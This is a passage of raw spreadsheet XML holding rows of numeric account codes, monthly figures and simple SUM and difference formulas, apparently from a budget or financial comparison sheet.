        <v>0</v>
      </c>
      <c r="AP20" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="18" customHeight="1" spans="1:42">
      <c r="A21" s="10">
        <v>101010127</v>
      </c>
      <c r="B21" s="16" t="s">
        <v>2545</v>
      </c>
      <c r="C21" s="17">
        <v>0</v>
      </c>
      <c r="D21" s="13">
        <v>2010202</v>
      </c>
      <c r="E21" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F21" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AF21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AG21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AH21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AI21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AJ21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AK21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AL21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AM21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AN21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AO21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP21" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="18" customHeight="1" spans="1:42">
      <c r="A22" s="10">
        <v>101010129</v>
      </c>
      <c r="B22" s="16" t="s">
        <v>2546</v>
      </c>
      <c r="C22" s="17">
        <v>0</v>
      </c>
      <c r="D22" s="13">
        <v>2010203</v>
      </c>
      <c r="E22" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F22" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AF22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AG22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AH22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AI22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AJ22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AK22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AL22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AM22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AN22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AO22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP22" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="18" customHeight="1" spans="1:42">
      <c r="A23" s="10">
        <v>101010130</v>
      </c>
      <c r="B23" s="16" t="s">
        <v>2547</v>
      </c>
      <c r="C23" s="17">
        <v>0</v>
      </c>
      <c r="D23" s="13">
        <v>2010204</v>
      </c>
      <c r="E23" s="16" t="s">
        <v>2548</v>
      </c>
      <c r="F23" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AF23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AG23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AH23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AI23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AJ23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AK23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AL23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AM23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AN23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AO23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP23" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="18" customHeight="1" spans="1:42">
      <c r="A24" s="10">
        <v>101010131</v>
      </c>
      <c r="B24" s="16" t="s">
        <v>2549</v>
      </c>
      <c r="C24" s="17">
        <v>0</v>
      </c>
      <c r="D24" s="13">
        <v>2010205</v>
      </c>
      <c r="E24" s="16" t="s">
        <v>2550</v>
      </c>
      <c r="F24" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AF24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AG24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AH24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AI24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AJ24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AK24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AL24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AM24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AN24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AO24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP24" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="18" customHeight="1" spans="1:42">
      <c r="A25" s="10">
        <v>101010132</v>
      </c>
      <c r="B25" s="16" t="s">
        <v>2551</v>
      </c>
      <c r="C25" s="17">
        <v>0</v>
      </c>
      <c r="D25" s="13">
        <v>2010206</v>
      </c>
      <c r="E25" s="16" t="s">
        <v>2552</v>
      </c>
      <c r="F25" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AF25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AG25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AH25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AI25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AJ25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AK25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AL25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AM25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AN25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AO25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP25" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="18" customHeight="1" spans="1:42">
      <c r="A26" s="10">
        <v>101010133</v>
      </c>
      <c r="B26" s="16" t="s">
        <v>2553</v>
      </c>
      <c r="C26" s="17">
        <v>0</v>
      </c>
      <c r="D26" s="13">
        <v>2010250</v>
      </c>
      <c r="E26" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F26" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AF26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AG26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AH26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AI26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AJ26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AK26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AL26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AM26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AN26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AO26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP26" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="18" customHeight="1" spans="1:42">
      <c r="A27" s="10">
        <v>101010134</v>
      </c>
      <c r="B27" s="16" t="s">
        <v>2554</v>
      </c>
      <c r="C27" s="17">
        <v>0</v>
      </c>
      <c r="D27" s="13">
        <v>2010299</v>
      </c>
      <c r="E27" s="16" t="s">
        <v>2555</v>
      </c>
      <c r="F27" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AF27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AG27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AH27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AI27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AJ27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AK27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AL27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AM27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AN27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AO27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP27" s="17">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="18" customHeight="1" spans="1:42">
      <c r="A28" s="10">
        <v>101010135</v>
      </c>
      <c r="B28" s="16" t="s">
        <v>2556</v>
      </c>
      <c r="C28" s="17">
        <v>0</v>
      </c>
      <c r="D28" s="13">
        <v>20103</v>
      </c>
      <c r="E28" s="11" t="s">
        <v>2557</v>
      </c>
      <c r="F28" s="14">
        <f t="shared" si="2"/>
        <v>12688</v>
      </c>
      <c r="G28" s="12">
        <f t="shared" ref="G28:R28" si="12">SUM(G29:G38)</f>
        <v>1327</v>
      </c>
      <c r="H28" s="12">
        <f t="shared" si="12"/>
        <v>1780</v>
      </c>
      <c r="I28" s="12">
        <f t="shared" si="12"/>
        <v>963</v>
      </c>
      <c r="J28" s="12">
        <f t="shared" si="12"/>
        <v>1618</v>
      </c>
      <c r="K28" s="12">
        <f t="shared" si="12"/>
        <v>1159</v>
      </c>
      <c r="L28" s="12">
        <f t="shared" si="12"/>
        <v>2032</v>
      </c>
      <c r="M28" s="12">
        <f t="shared" si="12"/>
        <v>937</v>
      </c>
      <c r="N28" s="12">
        <f t="shared" si="12"/>
        <v>1470</v>
      </c>
      <c r="O28" s="12">
        <f t="shared" si="12"/>
        <v>1010</v>
      </c>
      <c r="P28" s="12">
        <f t="shared" si="12"/>
        <v>940</v>
      </c>
      <c r="Q28" s="12">
        <f t="shared" si="12"/>
        <v>1069</v>
      </c>
      <c r="R28" s="12">
        <f t="shared" si="12"/>
        <v>1490</v>
      </c>
      <c r="S28" s="12">
        <v>1373</v>
      </c>
      <c r="T28" s="12">
        <v>1668</v>
      </c>
      <c r="U28" s="12">
        <v>1499</v>
      </c>
      <c r="V28" s="12">
        <v>1798</v>
      </c>
      <c r="W28" s="12">
        <v>1058</v>
      </c>
      <c r="X28" s="12">
        <v>1777</v>
      </c>
      <c r="Y28" s="12">
        <v>978</v>
      </c>
      <c r="Z28" s="12">
        <v>1300</v>
      </c>
      <c r="AA28" s="12">
        <v>912</v>
      </c>
      <c r="AB28" s="12">
        <v>990</v>
      </c>
      <c r="AC28" s="12">
        <v>942</v>
      </c>
      <c r="AD28" s="12">
        <v>1360</v>
      </c>
      <c r="AE28" s="12">
        <f t="shared" ref="AE28:AP28" si="13">SUM(AE29:AE38)</f>
        <v>-46</v>
      </c>
      <c r="AF28" s="12">
        <f t="shared" si="13"/>
        <v>112</v>
      </c>
      <c r="AG28" s="12">
        <f t="shared" si="13"/>
        <v>-536</v>
      </c>
      <c r="AH28" s="12">
        <f t="shared" si="13"/>
        <v>-180</v>
      </c>
      <c r="AI28" s="12">
        <f t="shared" si="13"/>
        <v>101</v>
      </c>
      <c r="AJ28" s="12">
        <f t="shared" si="13"/>
        <v>255</v>
      </c>
      <c r="AK28" s="12">
        <f t="shared" si="13"/>
        <v>-41</v>
      </c>
      <c r="AL28" s="12">
        <f t="shared" si="13"/>
        <v>170</v>
      </c>
      <c r="AM28" s="12">
        <f t="shared" si="13"/>
        <v>98</v>
      </c>
      <c r="AN28" s="12">
        <f t="shared" si="13"/>
        <v>-50</v>
      </c>
      <c r="AO28" s="12">
        <f t="shared" si="13"/>
        <v>127</v>
      </c>
      <c r="AP28" s="12">
        <f t="shared" si="13"/>
        <v>130</v>
      </c>
    </row>
    <row r="29" ht="18" customHeight="1" spans="1:42">
      <c r="A29" s="10">
        <v>101010136</v>
      </c>
      <c r="B29" s="16" t="s">
        <v>2558</v>
      </c>
      <c r="C29" s="17">
        <v>0</v>
      </c>
      <c r="D29" s="13">
        <v>2010301</v>
      </c>
      <c r="E29" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F29" s="14">
        <f t="shared" si="2"/>
        <v>12255</v>
      </c>
      <c r="G29" s="17">
        <v>902</v>
      </c>
      <c r="H29" s="17">
        <v>1750</v>
      </c>
      <c r="I29" s="17">
        <v>963</v>
      </c>
      <c r="J29" s="17">
        <f>1583+1</f>
        <v>1584</v>
      </c>
      <c r="K29" s="17">
        <v>777</v>
      </c>
      <c r="L29" s="17">
        <v>2015</v>
      </c>
      <c r="M29" s="17">
        <v>937</v>
      </c>
      <c r="N29" s="17">
        <v>1470</v>
      </c>
      <c r="O29" s="17">
        <v>1010</v>
      </c>
      <c r="P29" s="17">
        <v>940</v>
      </c>
      <c r="Q29" s="17">
        <v>1069</v>
      </c>
      <c r="R29" s="17">
        <v>1490</v>
      </c>
      <c r="S29" s="17">
        <v>812</v>
      </c>
      <c r="T29" s="17">
        <v>1639</v>
      </c>
      <c r="U29" s="17">
        <v>1499</v>
      </c>
      <c r="V29" s="17">
        <v>1764</v>
      </c>
      <c r="W29" s="17">
        <v>710</v>
      </c>
      <c r="X29" s="17">
        <v>1760</v>
      </c>
      <c r="Y29" s="17">
        <v>978</v>
      </c>
      <c r="Z29" s="17">
        <v>1300</v>
      </c>
      <c r="AA29" s="17">
        <v>912</v>
      </c>
      <c r="AB29" s="17">
        <v>990</v>
      </c>
      <c r="AC29" s="17">
        <v>942</v>
      </c>
      <c r="AD29" s="17">
        <v>1360</v>
      </c>
      <c r="AE29" s="17">
        <f t="shared" ref="AE29:AP38" si="14">G29-S29</f>
        <v>90</v>
      </c>
      <c r="AF29" s="17">
        <f t="shared" si="14"/>
        <v>111</v>
      </c>
      <c r="AG29" s="17">
        <f t="shared" si="14"/>
        <v>-536</v>
      </c>
      <c r="AH29" s="17">
        <f t="shared" si="14"/>
        <v>-180</v>
      </c>
      <c r="AI29" s="17">
        <f t="shared" si="14"/>
        <v>67</v>
      </c>
      <c r="AJ29" s="17">
        <f t="shared" si="14"/>
        <v>255</v>
      </c>
      <c r="AK29" s="17">
        <f t="shared" si="14"/>
        <v>-41</v>
      </c>
      <c r="AL29" s="17">
        <f t="shared" si="14"/>
        <v>170</v>
      </c>
      <c r="AM29" s="17">
        <f t="shared" si="14"/>
        <v>98</v>
      </c>
      <c r="AN29" s="17">
        <f t="shared" si="14"/>
        <v>-50</v>
      </c>
      <c r="AO29" s="17">
        <f t="shared" si="14"/>
        <v>127</v>
      </c>
      <c r="AP29" s="17">
        <f t="shared" si="14"/>
        <v>130</v>
      </c>
    </row>
    <row r="30" ht="18" customHeight="1" spans="1:42">
      <c r="A30" s="10">
        <v>101010137</v>
      </c>
      <c r="B30" s="16" t="s">
        <v>2559</v>
      </c>
      <c r="C30" s="17">
        <v>0</v>
      </c>
      <c r="D30" s="13">
        <v>2010302</v>
      </c>
      <c r="E30" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F30" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="G30" s="17">
        <v>405</v>
      </c>
      <c r="H30" s="17"/>
      <c r="I30" s="17"/>
      <c r="J30" s="17"/>
      <c r="K30" s="17"/>
      <c r="L30" s="17"/>
      <c r="M30" s="17"/>
      <c r="N30" s="17"/>
      <c r="O30" s="17"/>
      <c r="P30" s="17"/>
      <c r="Q30" s="17"/>
      <c r="R30" s="17"/>
      <c r="S30" s="17">
        <v>541</v>
      </c>
      <c r="T30" s="17"/>
      <c r="U30" s="17"/>
      <c r="V30" s="17"/>
      <c r="W30" s="17"/>
      <c r="X30" s="17"/>
      <c r="Y30" s="17"/>
      <c r="Z30" s="17"/>
      <c r="AA30" s="17"/>
      <c r="AB30" s="17"/>
      <c r="AC30" s="17"/>
      <c r="AD30" s="17"/>
      <c r="AE30" s="17">
        <f t="shared" si="14"/>
        <v>-136</v>
      </c>
      <c r="AF30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AG30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AH30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AI30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AJ30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AK30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AL30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AM30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AN30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AO30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AP30" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="18" customHeight="1" spans="1:42">
      <c r="A31" s="10">
        <v>101010138</v>
      </c>
      <c r="B31" s="16" t="s">
        <v>2560</v>
      </c>
      <c r="C31" s="17">
        <v>0</v>
      </c>
      <c r="D31" s="13">
        <v>2010303</v>
      </c>
      <c r="E31" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F31" s="14">
        <f t="shared" si="2"/>
        <v>83</v>
      </c>
      <c r="G31" s="17"/>
      <c r="H31" s="17"/>
      <c r="I31" s="17"/>
      <c r="J31" s="17"/>
      <c r="K31" s="17">
        <v>83</v>
      </c>
      <c r="L31" s="17"/>
      <c r="M31" s="17"/>
      <c r="N31" s="17"/>
      <c r="O31" s="17"/>
      <c r="P31" s="17"/>
      <c r="Q31" s="17"/>
      <c r="R31" s="17"/>
      <c r="S31" s="17"/>
      <c r="T31" s="17"/>
      <c r="U31" s="17"/>
      <c r="V31" s="17"/>
      <c r="W31" s="17">
        <v>83</v>
      </c>
      <c r="X31" s="17"/>
      <c r="Y31" s="17"/>
      <c r="Z31" s="17"/>
      <c r="AA31" s="17"/>
      <c r="AB31" s="17"/>
      <c r="AC31" s="17"/>
      <c r="AD31" s="17"/>
      <c r="AE31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AF31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AG31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AH31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AI31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AJ31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AK31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AL31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AM31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AN31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AO31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AP31" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="18" customHeight="1" spans="1:42">
      <c r="A32" s="10">
        <v>101010150</v>
      </c>
      <c r="B32" s="16" t="s">
        <v>2561</v>
      </c>
      <c r="C32" s="17">
        <v>0</v>
      </c>
      <c r="D32" s="13">
        <v>2010304</v>
      </c>
      <c r="E32" s="16" t="s">
        <v>2562</v>
      </c>
      <c r="F32" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AF32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AG32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AH32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AI32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AJ32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AK32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AL32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AM32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AN32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AO32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AP32" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="18" customHeight="1" spans="1:42">
      <c r="A33" s="10">
        <v>101010151</v>
      </c>
      <c r="B33" s="16" t="s">
        <v>2563</v>
      </c>
      <c r="C33" s="17">
        <v>0</v>
      </c>
      <c r="D33" s="13">
        <v>2010305</v>
      </c>
      <c r="E33" s="16" t="s">
        <v>2564</v>
      </c>
      <c r="F33" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AF33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AG33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AH33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AI33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AJ33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AK33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AL33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AM33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AN33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AO33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AP33" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="18" customHeight="1" spans="1:42">
      <c r="A34" s="10">
        <v>101010152</v>
      </c>
      <c r="B34" s="16" t="s">
        <v>2565</v>
      </c>
      <c r="C34" s="17">
        <v>0</v>
      </c>
      <c r="D34" s="13">
        <v>2010306</v>
      </c>
      <c r="E34" s="16" t="s">
        <v>2566</v>
      </c>
      <c r="F34" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="G34" s="17"/>
      <c r="H34" s="17"/>
      <c r="I34" s="17"/>
      <c r="J34" s="17"/>
      <c r="K34" s="17"/>
      <c r="L34" s="17"/>
      <c r="M34" s="17"/>
      <c r="N34" s="17"/>
      <c r="O34" s="17"/>
      <c r="P34" s="17"/>
      <c r="Q34" s="17"/>
      <c r="R34" s="17"/>
      <c r="S34" s="17"/>
      <c r="T34" s="17"/>
      <c r="U34" s="17"/>
      <c r="V34" s="17"/>
      <c r="W34" s="17"/>
      <c r="X34" s="17"/>
      <c r="Y34" s="17"/>
      <c r="Z34" s="17"/>
      <c r="AA34" s="17"/>
      <c r="AB34" s="17"/>
      <c r="AC34" s="17"/>
      <c r="AD34" s="17"/>
      <c r="AE34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AF34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AG34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AH34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AI34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AJ34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AK34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AL34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AM34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AN34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AO34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AP34" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="18" customHeight="1" spans="1:42">
      <c r="A35" s="10">
        <v>101010153</v>
      </c>
      <c r="B35" s="16" t="s">
        <v>2567</v>
      </c>
      <c r="C35" s="17">
        <v>0</v>
      </c>
      <c r="D35" s="13">
        <v>2010308</v>
      </c>
      <c r="E35" s="16" t="s">
        <v>2568</v>
      </c>
      <c r="F35" s="14">
        <f t="shared" si="2"/>
        <v>69</v>
      </c>
      <c r="G35" s="17">
        <v>20</v>
      </c>
      <c r="H35" s="17">
        <v>30</v>
      </c>
      <c r="I35" s="17"/>
      <c r="J35" s="17"/>
      <c r="K35" s="17">
        <v>52</v>
      </c>
      <c r="L35" s="17">
        <v>17</v>
      </c>
      <c r="M35" s="17"/>
      <c r="N35" s="17"/>
      <c r="O35" s="17"/>
      <c r="P35" s="17"/>
      <c r="Q35" s="17"/>
      <c r="R35" s="17"/>
      <c r="S35" s="17">
        <v>20</v>
      </c>
      <c r="T35" s="17">
        <v>29</v>
      </c>
      <c r="U35" s="17"/>
      <c r="V35" s="17"/>
      <c r="W35" s="17">
        <v>43</v>
      </c>
      <c r="X35" s="17">
        <v>17</v>
      </c>
      <c r="Y35" s="17"/>
      <c r="Z35" s="17"/>
      <c r="AA35" s="17"/>
      <c r="AB35" s="17"/>
      <c r="AC35" s="17"/>
      <c r="AD35" s="17"/>
      <c r="AE35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AF35" s="17">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AG35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AH35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AI35" s="17">
        <f t="shared" si="14"/>
        <v>9</v>
      </c>
      <c r="AJ35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AK35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AL35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AM35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AN35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AO35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AP35" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="18" customHeight="1" spans="1:42">
      <c r="A36" s="10">
        <v>1010201</v>
      </c>
      <c r="B36" s="11" t="s">
        <v>2569</v>
      </c>
      <c r="C36" s="17">
        <v>0</v>
      </c>
      <c r="D36" s="13">
        <v>2010309</v>
      </c>
      <c r="E36" s="16" t="s">
        <v>2570</v>
      </c>
      <c r="F36" s="14">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>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f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AF36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AG36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AH36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AI36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AJ36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AK36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AL36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AM36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AN36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AO36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AP36" s="17">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="18" customHeight="1" spans="1:42">
      <c r="A37" s="10">
